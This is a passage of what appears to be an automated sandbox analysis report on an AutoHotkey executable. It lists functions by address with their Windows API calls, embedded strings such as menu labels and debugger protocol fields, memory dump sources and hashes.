                                      • String ID: Bind$Call$IsBuiltIn$IsByRef$IsOptional$IsVariadic$MaxParams$MinParams$Name$Out of memory.
                                      • API String ID: 3832890014-142481380
                                      • Opcode ID: 3e2eff208633752e0993a14e00a3c26cf569ffffbbed9707dd1ab10e4a7dcefe
                                      • Instruction ID: 6382360fe29255c10e92afe5e026822ddcac352e7cdc73af29a7e5d6ba818f95
                                      • Opcode Fuzzy Hash: 3e2eff208633752e0993a14e00a3c26cf569ffffbbed9707dd1ab10e4a7dcefe
                                      • Instruction Fuzzy Hash: C0C1A2B17002049BC714DE19D881A9AB7A4EB94325F14C57FED0DCB342E63AEC65C7DA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00485450 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 345COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp_wcsncpy$Window__wcsicoll__wcstoi64__wcstoui64wcstoxq
                                      • String ID: ahk_$class$exe$group$pid
                                      • API String ID: 3421470534-2955265324
                                      • Opcode ID: bd9c6dd4f57b73021c6f485e735bb645d38489f5f695bd1ee35da8283544e67d
                                      • Instruction ID: 6a84890d9bf1b485dcddb57b1a7688d1c1bd548c526f45ea2f65b7e1e99a087c
                                      • Opcode Fuzzy Hash: bd9c6dd4f57b73021c6f485e735bb645d38489f5f695bd1ee35da8283544e67d
                                      • Instruction Fuzzy Hash: 7EC1DF71904B019AD734BA2588817BFB6E5AF94304F144C2FE88A97390F77CE984C79A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004680B2 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 215windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00468112
                                      • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0046813A
                                      • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00468160
                                      • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00468188
                                      • GetWindowRect.USER32(?,?), ref: 004681A9
                                      • GetParent.USER32(?), ref: 004681C8
                                      • ScreenToClient.USER32(00000000), ref: 004681CF
                                      • MoveWindow.USER32(80000000,?,?,?,80000000,00000001,?,?), ref: 0046822C
                                      • SendMessageW.USER32(?,00000421,00000001,00000000), ref: 00468254
                                      • SendMessageW.USER32(00000000,00000421,00000000,00000000), ref: 00468265
                                      • SendMessageW.USER32(?,00000420,00000001,00000000), ref: 0046827B
                                      • InvalidateRect.USER32(00000000,00000000,00000001,?,00000420,00000001,00000000,?,00000421,00000001,00000000,?,?), ref: 00468282
                                      • SendMessageW.USER32(?,00000420,00000000,?), ref: 0046829C
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000420,00000000,?,?,00000421,00000001,00000000,?,?), ref: 004682A3
                                      • GetPropW.USER32(?,ahk_autosize), ref: 004682D4
                                      • SetPropW.USER32(?,ahk_autosize,00000000), ref: 004682EE
                                      • RemovePropW.USER32(00000000,ahk_autosize), ref: 004682FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$PropRect$InvalidateWindow$ClientMoveParentRemoveScreen
                                      • String ID: ahk_autosize
                                      • API String ID: 1794348199-1503521729
                                      • Opcode ID: 5389d1d1724be63604d0ed7213f48b5f066d88b026f125e65738dd9ee2732068
                                      • Instruction ID: fffd4fefba2f0b0c9c692b87d13e20735f39b7d5aae2b17e218efbc3b7e34057
                                      • Opcode Fuzzy Hash: 5389d1d1724be63604d0ed7213f48b5f066d88b026f125e65738dd9ee2732068
                                      • Instruction Fuzzy Hash: 74719DB5A44300ABDB108F24DC85F6B7BF5EB89700F144A2EF54697290EB79E841CB5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00451590 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 181libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(user32,?,?,?,000000EC), ref: 004515B7
                                      • GetModuleHandleW.KERNEL32(kernel32,?,000000EC), ref: 004515C3
                                      • GetModuleHandleW.KERNEL32(comctl32,?,000000EC), ref: 004515CF
                                      • GetModuleHandleW.KERNEL32(gdi32,?,000000EC), ref: 004515DB
                                      • _wcsncpy.LIBCMT ref: 004515F7
                                      • _wcsrchr.LIBCMT ref: 00451613
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,000000EC), ref: 00451640
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00451660
                                      • GetProcAddress.KERNEL32(?,?), ref: 004516AF
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,-00000002,000000FF,?,00000104,00000000,00000000,?,?,?,?,000000EC), ref: 004516DD
                                      • GetModuleHandleW.KERNEL32(?,?,?,?,?,000000EC), ref: 004516EB
                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,000000EC), ref: 00451706
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0045173F
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00451768
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: HandleModule$AddressProc$ByteCharMultiWide$LibraryLoad_wcsncpy_wcsrchr
                                      • String ID: DllCall$comctl32$gdi32$kernel32$user32
                                      • API String ID: 1361463379-1793033601
                                      • Opcode ID: 3cf27ae7dfccc422dd56ddc5a21c4d2bc54ab338e4252f0410ca473f27aa339b
                                      • Instruction ID: 8926e76451c32b63e8524c9ca0c73068f0985b0ac3fbfa6a5b43536ab91cca47
                                      • Opcode Fuzzy Hash: 3cf27ae7dfccc422dd56ddc5a21c4d2bc54ab338e4252f0410ca473f27aa339b
                                      • Instruction Fuzzy Hash: 2B511871A003019BC720DB689CC5FABB3D5EF98711F45062BED0493291EB79D80987A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042C37A Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 114COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: AddRef$BindMethod$Clone$Function name too long.$GetBase$NewEnum$RawGet$RawSet$Release$SetBase
                                      • API String ID: 3832890014-3709995375
                                      • Opcode ID: 8106145871bcfaaab1991d5a9623dcd70f22f4ce3b156929718eb69226e3f8bd
                                      • Instruction ID: c3da75a34d2beea26b0ff4f36d2d3e28976fffe8be90f0fb2006a2535e22f36b
                                      • Opcode Fuzzy Hash: 8106145871bcfaaab1991d5a9623dcd70f22f4ce3b156929718eb69226e3f8bd
                                      • Instruction Fuzzy Hash: 3D31F762A0431256C710E664ADC1BAF32C99F94709F944D3FED0897240F76DDE05C7AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00477210 Relevance: 33.3, APIs: 11, Strings: 8, Instructions: 89windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AppendMenuW.USER32(00000000,00000000,0000FF14,&Open), ref: 0047723C
                                      • SetMenuDefaultItem.USER32(00000000,0000FF14,00000000,?,?,?,?,?,?,?,?,?,?,?,00477448), ref: 00477257
                                      • AppendMenuW.USER32(00000000,00000000,0000FF15,&Help), ref: 00477276
                                      • AppendMenuW.USER32(00000000,00000800,0000FF1C,00000000), ref: 00477288
                                      • AppendMenuW.USER32(00000000,00000000,0000FF16,&Window Spy), ref: 0047729A
                                      • AppendMenuW.USER32(00000000,00000000,0000FF17,&Reload This Script), ref: 004772AC
                                      • AppendMenuW.USER32(00000000,00000000,0000FF18,&Edit This Script), ref: 004772BE
                                      • AppendMenuW.USER32(00000000,00000800,0000FF1D,00000000), ref: 004772D0
                                      • AppendMenuW.USER32(00000000,00000000,0000FF19,&Suspend Hotkeys), ref: 004772E2
                                      • AppendMenuW.USER32(00000000,00000000,0000FF1A,&Pause Script), ref: 004772F4
                                      • AppendMenuW.USER32(00000000,00000000,0000FF1B,E&xit), ref: 00477306
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Menu$Append$DefaultItem
                                      • String ID: &Edit This Script$&Help$&Open$&Pause Script$&Reload This Script$&Suspend Hotkeys$&Window Spy$E&xit
                                      • API String ID: 1113060144-2163008055
                                      • Opcode ID: 81bbb8362711c3794b3411fe7fbd6b33fd784eeb40721f1b804b8e58442e051f
                                      • Instruction ID: 7c9fc8dc6d70a2b947e7a5a679c5a139396633a8d8e9188bddb434aa777533ed
                                      • Opcode Fuzzy Hash: 81bbb8362711c3794b3411fe7fbd6b33fd784eeb40721f1b804b8e58442e051f
                                      • Instruction Fuzzy Hash: A6214F71384701B7E630A6659C46F37B3E87F99B00F244A6EF2856A9D1D6F8F8009A58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E4F0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 169threadsleepsynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00002000,0040E820,00000000,00000000,004D860C), ref: 0040E54A
                                      • SetThreadPriority.KERNEL32(00000000,0000000F,?,00408D82,00000000,004089D8,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000000,0040635D,?), ref: 0040E560
                                      • PostThreadMessageW.USER32(00000000,00000417,0040635D,00000000), ref: 0040E584
                                      • Sleep.KERNEL32(0000000A,?,00408D82,00000000,004089D8,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000000,0040635D,?), ref: 0040E590
                                      • GetTickCount.KERNEL32 ref: 0040E5A7
                                      • PeekMessageW.USER32(?,00000000,00000417,00000417,00000001), ref: 0040E5CA
                                      • CreateMutexW.KERNEL32(00000000,00000000,AHK Keybd), ref: 0040E645
                                      • GetExitCodeThread.KERNEL32(00000000,?), ref: 0040E65A
                                      • GetTickCount.KERNEL32 ref: 0040E66A
                                      • Sleep.KERNEL32(00000000), ref: 0040E677
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E68F
                                        • Part of subcall function 0040EBD0: _free.LIBCMT ref: 0040EC3D
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E6AF
                                      • CreateMutexW.KERNEL32(00000000,00000000,AHK Mouse), ref: 0040E6D4
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E6EB
                                      Strings
                                      • Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 0040E719
                                      • AHK Mouse, xrefs: 0040E6CB
                                      • AHK Keybd, xrefs: 0040E63C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Thread$CloseCreateHandle$CountMessageMutexSleepTick$CodeExitPeekPostPriority_free
                                      • String ID: AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
                                      • API String ID: 1532042170-3816831916
                                      • Opcode ID: 23d90f9c996b4e07bf0fc789c2b08ea42d8cf7cb7dee605126522ddea8c32e86
                                      • Instruction ID: 2f1244df52f477ce63b06e909344561eb5779c58dfd47d192972e3377f48f2cc
                                      • Opcode Fuzzy Hash: 23d90f9c996b4e07bf0fc789c2b08ea42d8cf7cb7dee605126522ddea8c32e86
                                      • Instruction Fuzzy Hash: 39513570509340AAEB20AF72AC4976A7F945B51308F044C7FF981A72E1C6BD9954CB5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004821D0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 168windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetIconInfo.USER32(?,?), ref: 004821E1
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00482206
                                      • CreateCompatibleDC.GDI32(00000000), ref: 0048221C
                                      • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 00482270
                                      • SelectObject.GDI32(00000000,00000000), ref: 00482283
                                      • DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 004822A7
                                      • GdiFlush.GDI32 ref: 004822AD
                                      • GetDIBits.GDI32(?,?,00000000,?,?,00000028,00000000), ref: 004822EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CreateIconObject$BitsCompatibleDrawFlushInfoSectionSelect
                                      • String ID: (
                                      • API String ID: 1804173336-3887548279
                                      • Opcode ID: 7ad89fa2ee1f0e495a883556e7fdf8e489759fe448408d71e58f409c9e89669c
                                      • Instruction ID: 6972e2dce53691666e7fefc6317c458e44308deae0b99e39feb985e93d542706
                                      • Opcode Fuzzy Hash: 7ad89fa2ee1f0e495a883556e7fdf8e489759fe448408d71e58f409c9e89669c
                                      • Instruction Fuzzy Hash: 675141B1E04309AFDB10DFA4DD85BEEBBB8FB49704F10446AE906E7250D7749941CB68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045D310 Relevance: 28.5, APIs: 13, Strings: 3, Instructions: 460windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041C620: __wcsicoll.LIBCMT ref: 0041C638
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • SendMessageTimeoutW.USER32(00000000,000000F0,00000000,00000000,00000002,000007D0,?), ref: 0045D388
                                      • IsWindowEnabled.USER32(00000000), ref: 0045D3BC
                                      • IsWindowVisible.USER32(00000000), ref: 0045D3E6
                                      • SendMessageTimeoutW.USER32(00000000,0000130B,00000000,00000000,00000002,000007D0,?), ref: 0045D424
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D45A
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D4B7
                                      • SendMessageTimeoutW.USER32(00000000,00000188,00000000,00000000,00000002,000007D0,?), ref: 0045D51B
                                      • SendMessageTimeoutW.USER32(00000000,0000018A,?,00000000,00000002,000007D0,?), ref: 0045D541
                                      • SendMessageTimeoutW.USER32(00000000,00000189,?,00000000), ref: 0045D59A
                                      • GetClassNameW.USER32(00000000,?,00000020), ref: 0045D63F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSendTimeout$Window$ClassName$Visible$EnabledForeground__wcsicoll
                                      • String ID: Combo$List$SysListView32
                                      • API String ID: 4132077911-371123625
                                      • Opcode ID: 24e2f6f1879e2e4d79d6b8c540c3f82741fb714635e65524f2bf609029a11b59
                                      • Instruction ID: dac04c0092e0fb85eaeaff9f384db84dbf63f8bde4f24adb61746dfc3bc048c4
                                      • Opcode Fuzzy Hash: 24e2f6f1879e2e4d79d6b8c540c3f82741fb714635e65524f2bf609029a11b59
                                      • Instruction Fuzzy Hash: 94F1A231E00209ABDB20DBA58C85FAF7374EF45716F10416AFD11AB2C2DB78AD4A875D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00440040 Relevance: 28.5, APIs: 15, Strings: 1, Instructions: 452COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • _memset.LIBCMT ref: 004401A7
                                      • __fassign.LIBCMT ref: 00440217
                                      • GetWindowRect.USER32(00000000,?), ref: 00440292
                                      • EnumChildWindows.USER32(00000000,Function_00046E40,?), ref: 004402B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$ChildEnumForegroundRectVisibleWindows__fassign_memset
                                      • String ID: Pos
                                      • API String ID: 2064314021-3096748108
                                      • Opcode ID: 5a60733ac8b9987e5c79c4918efa9ee7838a912ab26a9d9a906cff35c6bc6f09
                                      • Instruction ID: ecbd55821413f23d8fe50c1a24b17c65f091f3454bc6e4d15ba7f8450c114e7e
                                      • Opcode Fuzzy Hash: 5a60733ac8b9987e5c79c4918efa9ee7838a912ab26a9d9a906cff35c6bc6f09
                                      • Instruction Fuzzy Hash: CEF121719083409BE730DF248C45B6BB7E0BB85314F180A1EFA95973C2D77D9895CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044E180 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 252timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountLocalTickTime__swprintf__wcsicoll
                                      • String ID: %02d$%03d$MSec
                                      • API String ID: 3794994719-2031959049
                                      • Opcode ID: 4d48839f0752a7cc93457b04d29495e063d95f790b1232a88a57dfb7d0d4b535
                                      • Instruction ID: 28eff125f1fa4b3b91b712dcf2ab7940d30725b63dc97be352ac4c167f647d87
                                      • Opcode Fuzzy Hash: 4d48839f0752a7cc93457b04d29495e063d95f790b1232a88a57dfb7d0d4b535
                                      • Instruction Fuzzy Hash: 13517977B41124A5EA04A76BBC426BB7358F790B2A714013BFD4DC12E3E66D881192FE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004064E0 Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 190COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: <response command="feature_get" feature_name="%e" supported="%i" transaction_id="%e">%s</response>$breakpoint_types$encoding$language_$max_children$max_data$max_depth$multiple_sessions$name$protocol_version$supports_async$supports_threads$version
                                      • API String ID: 909875538-401246380
                                      • Opcode ID: 2c8e0840efb0858b8d2f5755e025ccd96df2964a11d2946cb060a168e4820a0c
                                      • Instruction ID: 514b81af1670027c9812cb6e32d09f69b9181f46570d496278249d187971897f
                                      • Opcode Fuzzy Hash: 2c8e0840efb0858b8d2f5755e025ccd96df2964a11d2946cb060a168e4820a0c
                                      • Instruction Fuzzy Hash: 8C512932604208BBDB288E149C81BA73B55A711325F16C477F806BF2C1D77BCD6553AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041F410 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 261COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindResourceW.KERNEL32(00000000,?,0000000A,?,?,00000000,0041F063,004DA728,?,004B6410,00000000,00000000), ref: 0041F5BD
                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000000,0041F063,004DA728,?,004B6410,00000000,00000000,?,?,?,?,00404330), ref: 0041F5CC
                                      • LockResource.KERNEL32(00000000,?,?,00000000,0041F063,004DA728,?,004B6410,00000000,00000000,?,?,?,?,00404330), ref: 0041F5DB
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,00000000,0041F063,004DA728,?,004B6410,00000000,00000000,?,?,?,?,00404330), ref: 0041F5EC
                                      • FindResourceW.KERNEL32(00000001,00000002,0000000A,0000030C,00404330), ref: 0041F6C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Resource$Find$LoadLockSizeof
                                      • String ID: #Include$%s file "%s" cannot be opened.$*#2$Out of memory.$Script$Too many includes.
                                      • API String ID: 3127896203-3189951223
                                      • Opcode ID: 5b5f8418b385b989ad7b977a0ef3fc0333d2a2c71e0d7c55dd7bb1afdf25ec49
                                      • Instruction ID: ab72926b21a12e27e373e2e937b4ca6f6c5f5e8244608b440d9959419cd3cee0
                                      • Opcode Fuzzy Hash: 5b5f8418b385b989ad7b977a0ef3fc0333d2a2c71e0d7c55dd7bb1afdf25ec49
                                      • Instruction Fuzzy Hash: 9391D4717003019BD7209F24EC81BA777A5AB95314F04453BEA4987292EB7DDC8BC7AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B2D0 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 209COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcschr.LIBCMT ref: 0041B2D9
                                      • __fassign.LIBCMT ref: 0041B31B
                                        • Part of subcall function 0049A0CD: __fassign.LIBCMT ref: 0049A0C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
